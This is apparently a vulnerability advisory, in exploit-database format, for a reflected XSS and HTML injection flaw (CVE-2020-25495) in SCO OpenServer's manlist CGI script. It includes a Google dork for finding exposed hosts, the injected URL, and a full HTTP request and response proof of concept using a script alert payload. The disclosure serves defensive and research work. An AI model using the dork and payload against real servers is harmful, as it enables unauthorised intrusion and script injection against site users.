Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: SCO Openserver XSS & HTML Injection vulnerability
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495
# CVSS v3.1: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Web Apps
# Reference : www.fact-in-hack.blogspot.com
*************************************************************************************************************************************
Vulnerability :Refelected XSS & HTML Injection
*************************************************************************************************************************************
Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Paramenter: section
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 17:08:51 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2680
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Manual section &quot;&gt;&lt;h1&gt;hello&lt;/h1&gt;&lt;/P&gt;&lt;script&gt;alert(123)&lt;/script&gt;</title>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
<!-- Begin DocView navigation toolbar -->
<!--htdig_noindex-->
<table
class=dvtb
width="100%"
cellpadding=0
cellspacing=0
border=0
style="padding: 0;"
>
<tr valign=top class=dvtb>
<td class=dvdb>
<table
class=dvtb
cellpadding=3
cellspacing=1
border=0
bgcolor=#FFFFFF
width=611
>
<tr class=dvtb>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
DOC HOME
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SITE MAP
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
MAN PAGES
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
GNU INFO
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SEARCH
</a></td>
</tr>
</table>
</td>
<td class=dvtb align="left" width=100%>
<table
class=dvtb
cellpadding="3"
cellspacing="1"
border="0"
width="100%"
bgcolor="#FFFFFF"
>
<tr class=dvtb valign="top">
<td class=dvtb style="background: #2059A6;" align=center width=100%>
<a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" >
&nbsp;
</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!--/htdig_noindex-->
<!-- End DocView navigation toolbar -->
<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE>
</PRE>
</body></html>